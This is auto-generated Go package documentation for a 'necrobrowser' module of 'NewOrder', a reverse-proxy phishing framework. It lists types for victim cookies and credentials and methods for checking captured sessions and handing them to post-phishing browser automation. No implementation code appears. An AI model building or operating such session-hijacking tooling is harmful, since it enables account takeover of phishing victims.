Documentation ¶
Overview ¶
*
## ## ######## ## ## ####### ######## ######## ######## ######## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## #### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ###### ## ## ## ## ## ######## ## ## ###### ######## ## #### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ######## ### ### ####### ## ## ######## ######## ## ##
"NewOrder" - Reverse Proxy SE "CHANGE THE WORLD..." Copyright 2022 (C) NEMESIS. neworder@tutamail.com. All rights reserved.
*
Index ¶
- Constants
- func Contains(slice *[]string, find string) bool
- type Necrobrowser
- func (module *Necrobrowser) Author() string
- func (module *Necrobrowser) CheckSessionCookies()
- func (module *Necrobrowser) CheckSessions()
- func (module *Necrobrowser) Description() string
- func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJSON string)
- func (module *Necrobrowser) Name() string
- func (module *Necrobrowser) Prompt()
- type SessionCookie
- type VictimCredentials
Constants ¶
const ( // Name of this module Name = "necrobrowser" // Description of this module Description = "Post-phishing automation via Necrobrowser-NG" // Author of this module Author = "NEMESIS" // Placeholders for templates CookiePlaceholder = "%%%COOKIES%%%" CredentialsPlaceholder = "%%%CREDENTIALS%%%" )
Variables ¶
This section is empty.
Functions ¶
Types ¶
type Necrobrowser ¶
type Necrobrowser struct { session.SessionModule Enabled bool Endpoint string Profile string Request string }
Necrobrowser module
func Load ¶
func Load(s *session.Session) (m *Necrobrowser, err error)
Load configures the module by initializing its main structure and variables
func (*Necrobrowser) Author ¶
func (module *Necrobrowser) Author() string
Author returns the module author
func (*Necrobrowser) CheckSessionCookies ¶
func (module *Necrobrowser) CheckSessionCookies()
func (*Necrobrowser) CheckSessions ¶
func (module *Necrobrowser) CheckSessions()
func (*Necrobrowser) Description ¶
func (module *Necrobrowser) Description() string
Description returns the module description
func (*Necrobrowser) Instrument ¶
func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJSON string)
func (*Necrobrowser) Prompt ¶
func (module *Necrobrowser) Prompt()
Prompt prints module status based on the provided parameters